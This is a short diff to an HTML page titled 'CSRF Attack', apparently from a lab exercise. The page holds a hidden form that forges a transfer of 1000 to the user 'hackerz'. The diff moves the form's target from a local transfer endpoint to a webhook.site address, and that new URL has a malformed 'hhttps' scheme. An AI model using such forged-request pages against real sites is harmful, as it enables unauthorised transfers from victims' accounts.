--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
     <title>CSRF Attack</title>
 </head>
 <body>
-    <form action="http://127.0.0.1:8080/transfer" method="POST">
+    <form action="hhttps://webhook.site/a6d320d6-cbaa-4b5c-b216-dfcf9036b541" method="POST">
         <input type="hidden" name="user_to" value="hackerz" />
         <input type="hidden" name="amount" value="1000" />
     </form>
